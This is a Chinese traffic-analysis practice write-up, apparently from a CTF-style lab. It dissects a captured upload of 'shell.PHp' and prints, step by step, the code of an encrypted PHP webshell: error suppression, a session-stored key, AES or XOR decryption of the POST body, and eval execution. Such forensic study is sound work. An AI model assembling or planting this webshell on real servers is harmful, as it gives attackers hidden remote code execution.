流量分析 - 练习篇7

ftp contains "PASS" 

1.文件上传：流量中包含了一个文件上传请求，文件名为 shell.PHp，它是一个 PHP 文件。Content-Disposition: form-data; name="tt"; filename="shell.PHp"Content-Type: application/octet-stream2. 禁用错误报告php@error_reporting(0);攻击者通过 @ 符号关闭了错误报告，这意味着在执行恶意代码时不会显示任何错误，帮助隐藏其行为。3. 会话管理phpsession_start();$key = "e45e329feb5d925b";  #16位md5加密下面是解密出来的明文//......32...md5.......16..........rebeyond  $_SESSION['k'] = $key;session_write_close();攻击者启动了 PHP 会话，并设置了一个加密密钥 key。密钥保存在会话中，可能用于后续的加密/解密操作。4. 数据处理php$post = file_get_contents("php://input");这行代码通过 php://input 获取了 POST 请求的原始数据。此数据包含了攻击者发送的加密或者编码后的负载。5. 加密和解密接下来，代码根据是否加载了 OpenSSL 扩展来执行不同的解密操作。若没有 OpenSSL 扩展，它使用 base64 解码并对解码后的数据进行 XOR 解密（使用事先定义的密钥）：phpif(!extension_loaded('openssl')) {    $t = "base64_" . "decode";    $post = $t($post . "");    for($i = 0; $i < strlen($post); $i++) {        $post[$i] = $post[$i] ^ $key[$i + 1 & 15];     }}如果安装了 OpenSSL 扩展，它会使用 AES128 解密：phpelse {    $post = openssl_decrypt($post, "AES128", $key);}6. 数据分割php$arr = explode('|', $post);$func = $arr[0];$params = $arr[1];这行代码将解密后的数据按 | 分隔成两个部分，第一个部分可能是要执行的函数名或操作，第二个部分是传递给该函数的参数。7. 执行代码phpclass C {     public function __invoke($p) {         eval($p . "");     }}@call_user_func(new C(), $params);这部分代码非常关键，它定义了一个 C 类，该类具有 __invoke() 方法，使得类的实例可以像函数一样被调用。eval() 函数执行传入的 PHP 代码。通过 call_user_func() 调用该方法，最终执行 $params 中包含的 PHP 代码。